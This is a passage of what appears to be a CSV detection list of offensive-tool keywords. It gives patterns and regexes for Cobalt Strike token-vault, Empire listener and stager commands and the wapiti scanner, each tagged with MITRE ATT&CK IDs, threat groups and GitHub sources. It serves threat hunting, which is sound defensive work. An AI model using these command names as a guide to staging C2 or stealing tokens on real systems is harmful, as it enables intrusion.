T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault use*","token\-vault\suse.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "uselistener http*","^uselistener\shttp.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","10","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "usestager *","^usestager\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","10","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "wapiti -*","wapiti\s\-.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","6","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z"